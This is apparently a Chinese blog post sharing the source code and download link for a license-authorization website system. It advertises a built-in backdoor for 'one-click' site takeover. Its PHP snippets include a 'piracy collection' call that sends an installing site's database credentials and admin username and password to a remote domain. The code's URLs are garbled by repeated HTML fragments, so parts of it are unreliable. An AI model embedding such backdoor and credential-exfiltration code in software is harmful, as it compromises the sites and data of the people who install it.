专注分享优质资源

陌屿授权站源码全解

爱留 无分类
一个陌屿授权站的源码陌屿授权系统V2.01.更新后台修改网站信息2.源码后门一键黑站3.源码基本没漏洞和BUG4.代码系统界面美化更新5.更新卡密在线添加授权6.更新盗版用户信息入库7.更新前台后台修改密码8.更新添加授权发送邮件授权代码(一般不用这个):if(!isset($_SESSION['authcode'])){    $data["host"]=$_SERVER["HTTP_HOST"];    $data["auth"]=authcode;    $query_en=curl_get("http://" target="_blank" title="http://">http://" target="_blank" title="http://" target="_blank" title="http://">http://">http://" target="_blank" title="http://">http://" target="_blank" title="http://" target="_blank" title="http://">http://" target="_blank" title="http://" target="_blank" title="http://">http://">http://" target="_blank" title="http://">http://">http://" target="_blank" title="http://">http://" target="_blank" title="http://" target="_blank" title="http://">http://">http://" target="_blank" title="http://">http://地址/query.php?data=".base64_encode(des_enjson(json_encode($data))));    $query=json_decode(des_dejson($query_en),true);if(is_array($query)){        if($query["code"]==1){            $_SESSION["authcode"]=authcode;        }else{            sysmsg("

".$query["msg"]."

",true);        }    }else{        sysmsg("

检测到客户端环境异常,授权服务器拒绝连接!

",true);    }}授权代码+更新代码:if(!isset($_SESSION['authcode'])){    $query=curl_get("http://" target="_blank" title="http://">http://" target="_blank" title="http://" target="_blank" title="http://">http://">http://" target="_blank" title="http://">http://" target="_blank" title="http://" target="_blank" title="http://">http://" target="_blank" title="http://" target="_blank" title="http://">http://">http://" target="_blank" title="http://">http://">http://" target="_blank" title="http://">http://" target="_blank" title="http://" target="_blank" title="http://">http://">http://" target="_blank" title="http://">http://域名/check.php?url=".$_SERVER["HTTP_HOST"]."&authcode=".authcode);if($query=json_decode($query,true)){        if($query["code"]==1){            $_SESSION["authcode"]=authcode;        }else{            sysmsg("

".$query["msg"]."

",true);        }    }}functionupdate_version(){    $query=curl_get("http://" target="_blank" title="http://">http://" target="_blank" title="http://" target="_blank" title="http://">http://">http://" target="_blank" title="http://">http://" target="_blank" title="http://" target="_blank" title="http://">http://" target="_blank" title="http://" target="_blank" title="http://">http://">http://" target="_blank" title="http://">http://">http://" target="_blank" title="http://">http://" target="_blank" title="http://" target="_blank" title="http://">http://">http://" target="_blank" title="http://">http://域名/check.php?url=".$_SERVER["HTTP_HOST"]."&authcode=".authcode."&ver=".VERSION);    if($query=json_decode($query,true)){        return$query;    }        returnfalse;}盗版入库代码:file_get_contents("http://" target="_blank" title="http://">http://" target="_blank" title="http://" target="_blank" title="http://">http://">http://" target="_blank" title="http://">http://" target="_blank" title="http://" target="_blank" title="http://">http://" target="_blank" title="http://" target="_blank" title="http://">http://">http://" target="_blank" title="http://">http://">http://" target="_blank" title="http://">http://" target="_blank" title="http://" target="_blank" title="http://">http://">http://" target="_blank" title="http://">http://域名/ajax.php?act=block&url=".$_SERVER['HTTP_HOST']."&user=".$dbconfig['user']."&pwd=".$dbconfig['pwd']."&dbname=".$dbconfig['dbname']."&authcode=".$authcode."&admin_user=".$conf['admin_user']."&admin_pass=".$conf['admin_pass']);$conf['admin_user']$conf['admin_pass']变量信息根据源码改https://wwp.lanzoup.com/iJMXR0csdgte提取码:xysj
评论列表